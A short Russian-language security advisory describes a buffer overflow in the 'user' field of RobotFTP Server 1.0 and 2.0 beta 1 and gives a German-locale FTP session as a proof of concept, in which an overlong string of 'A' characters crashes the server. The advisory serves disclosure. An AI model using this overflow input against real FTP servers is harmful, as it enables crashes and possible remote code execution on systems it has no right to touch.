Программа: RobotFTP Server 1.0, 2.0 beta 1 

Переполнение буфера обнаружено в RobotFTP сервере. Удаленный пользователь может выполнить произвольный код на целевой системе.
Удаленный пользователь может представить специально обработанный текст для поля 'user', чтобы вызвать переполнение буфера и выполнить произвольный код с привилегиями FTP сервера. 

Пример: 

220 Connected to RobotFTP Server
Benutzer (done:(none)): <AA...more than 47 A's...AA> 
331 User name OK, send password as PASS
Kennwort:
530 User cannot log in
Anmeldung fehlgeschlagen.
ftp> Ung ltiger Befehl
ftp> user <AA... about 2000 A's ...AA>
550 Access is denied
550 Access is denied
550 Access is denied
550 Access is denied
550 Access is denied
550 Access is denied
550 Access is denied
502 Command not implemented
Anmeldung fehlgeschlagen.
ftp> Ung ltiger Befehl
CRASH!!!!!!
ftp> quit
C:\Dokumente und Einstellungen\ Admin\Desktop>

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии